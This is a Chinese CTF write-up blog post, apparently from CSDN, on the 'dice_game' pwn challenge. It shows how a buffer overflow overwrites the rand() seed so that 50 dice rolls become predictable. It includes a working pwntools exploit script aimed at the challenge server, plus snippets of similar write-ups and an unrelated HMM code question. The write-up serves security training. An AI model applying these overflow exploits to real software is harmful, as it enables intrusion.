攻防世界dice_game(pwn)

最新推荐文章于 2024-07-09 08:30:01 发布
最新推荐文章于 2024-07-09 08:30:01 发布
阅读量4.6k 收藏 3
点赞数 2
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41429081/article/details/89953932
版权

dice_game

题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。

题目分析

在这里插入图片描述

这边就可以看到,buf覆盖0x40位就能覆盖到seed。
在这里插入图片描述

sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。
在这里插入图片描述
当回答正确50次时,会执行sub_B28这个函数,读取flag。
在这里插入图片描述

所以我们要做的就是,将seed覆盖掉,并且去预测生成的随机数。

exp

from pwn import *
from ctypes import *
p=remote('111.198.29.45','51654')
libc = cdll.LoadLibrary("libc.so.6")
p.recv()
payload=0x40*"a"+p64(0)
p.sendline(payload)

a=[]
for i in range(50):
	a.append(libc.rand()%6+1)
print(a)
for i in a:
	p.recv()
	print(p.recv())
	p.sendline(str(i))
p.interactive()

在这里插入图片描述

CTF小白
关注
专栏目录
adworld pwn dice_game分析
qq_39596232的博客
06-16 291
由于考研等种种原因,好久没有看pwn题了,这两天熟悉了一下,继续研究哈 这次分析的是攻防世界上的pwn练习题dice_game,可能太久没看pwn题了,已经有点忘记思路了,今天就当回顾一下啦 首先我们在ubuntu中看一下可执行文件基本信息: 没有canary保护,启用了栈不可执行,pie保护措施。64bit的elf文件,并且stripped 我们先尝试运行一下,看看程序功能,然后直接丢进IDA,分析代码: 主函数是这样的,我们可以明显地发现存在缓冲区溢出漏洞,开始的时候我在想能不..
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 557
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
攻防世界pwn——dice_game
qq_62076255的博客
12-19 475
攻防世界pwn——dice_game做题记录
攻防世界 guess_num
最新发布
weixin_73399382的博客
07-09 359
双击gets里面的v7,发现和seed紧邻且偏移地址相差20(16进制),因此可以直接利用溢出修改seed的值获取指定随机数。写个c程序获取一下可能的随机值,拿到Linux上跑,因为Windows和Linux生成的随机值可能不同。接下的思路就是利用gets函数溢出修改随机数种子的值为0,因为上面c程序获取的seed=0的随机值。file一下发现是elf文件,chmod 700 给执行权限后运行一下发现有两个输入,大概就这样。国际惯例checksec,发现栈溢出保护,不可执行,地址随机化都开启了,难搞!
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 1987
高手进阶区 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
pwn_dice_game
weixin_44464829的博客
10-31 285
常规操作:checksec dice_game 发现文件是64位 放入ida中看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其中一个是l
pwn dice_game
weixin_44319142的博客
05-02 524
dice_game 又是seed from pwn import * from ctypes import * context.log_level='debug' libc = cdll.LoadLibrary("libc.so.6") p = process('./dice_game') #p = remote("111.198.29.45",56813) p.recvuntil(" ...
dice_game攻防世界进阶区
shanwei274的博客
04-10 1750
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1795
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
dice_game
03-11
Dice_Game 两人游戏,旨在与朋友一起玩或在计算机上玩。 在这个游戏中,使用了六个面的骰子。 玩家将轮流滚动六张面Kong的骰子,直到有人达到一百张并赢得比赛为止。 轮到玩家时,他们可以选择滚动或按住。 如果...
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 308
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
diceGame
02-17
diceGame
dicegame
03-13
:game_die: 骰子游戏 简单的两人骰子游戏。 一旦用户单击“滚动骰子”按钮,骰子就会被随机抛出,因此玩家1和玩家2都有自己的骰子值。 然后,骰子游戏将根据骰子值较高宣布一个获胜者。 部署方式 演示: 建于 HTML CSS JavaScript 作者 Tillaberdiyev Ibrat 致谢 完整的2020 Web开发训练营(作者Angela Yu)
DiceGame
03-21
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行器。有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 生成被最小化,并且文件名包括哈希值。您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。 npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时eject 。此命令将从项目中删除单个构建依赖项。 相反,它将所有配置文件和传递依赖项(webpack,Babel,ESLin
Dice-Game:骰子游戏,第一个得分 100 或更多的人赢得游戏
05-30
骰子游戏 介绍 一个简单的骰子游戏,自己玩或与朋友对战。 玩家轮流滚动单个骰子,只要他们想要添加到运行总数即可。 如果玩家掷出 1,他们将失去他们的总分。当你想要时保持你的分数,当他们达到 100 分时,一个玩家获胜。 单击“新游戏”重置应用程序。 游戏规则 游戏有 2 名玩家,进行回合比赛。 在每一轮中,玩家可以根据自己的意愿掷骰子。 每个结果都会添加到他的 ROUND 分数中。 但是,如果玩家将其中一个骰子掷出 1,则他的所有 ROUND 分数都会丢失。 之后,轮到下一位玩家了 玩家可以选择“保持”,这意味着他的 ROUND 分数会被添加到他的 GLOBAL 分数中。 之后,就轮到下一位玩家了。 第一位在GLOBAL得分上达到100分的玩家将赢得比赛。 分数预定义为 100。 演示 信用 由来自的 Freepik 制作的图标 免费游戏,享受!
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 2005
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
功防世界dice_game
weixin_34190136的博客
05-03 264
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 463
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
import sys from hmmlearn.hmm import MultinomialHMM import numpy as np dice_num = 3 x_num = 8 dice_hmm = MultinomialHMM(n_components=3,n_features=8,n_trials=5) dice_hmm.startprob_ = np.ones(3) / 3.0 dice_hmm.transmat_ = np.ones((3, 3)) / 3.0 dice_hmm.emissionprob_ = np.array([[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]]) dice_hmm.emissionprob_ /= dice_hmm.emissionprob_.sum(axis=1)[:, np.newaxis] X = np.array([[0], [5], [2], [4], [1], [6], [2], [4], [1], [3], [2], [5], [0], [4], [3]]) Z = dice_hmm.decode(X) # 问题A logprob = dice_hmm.score(X) # 问题B # 问题C x_next = np.dot(dice_hmm.transmat_, dice_hmm.emissionprob_) print("state: ", Z) print("logprob: ", logprob) print("prob of x_next: ", x_next)请修改和完善以上代码
05-23
import sys from hmmlearn.hmm import MultinomialHMM import numpy as np dice_num = 3 x_num = 8 dice_hmm = MultinomialHMM(n_components=3, n_features=8) dice_hmm.startprob_ = np.ones(3) / 3.0 dice_hmm.transmat_ = np.ones((3, 3)) / 3.0 dice_hmm.emissionprob_ = np.array([[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]]) dice_hmm.emissionprob_ /= dice_hmm.emissionprob_.sum(axis=1)[:, np.newaxis] X = np.array([[0], [5], [2], [4], [1], [6], [2], [4], [1], [3], [2], [5], [0], [4], [3]]) # 问题A Z = dice_hmm.predict(X) # 问题B logprob = dice_hmm.score(X) # 问题C x_next = np.dot(dice_hmm.transmat_, dice_hmm.emissionprob_) print("state: ", Z) print("logprob: ", logprob) print("prob of x_next: ", x_next)
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值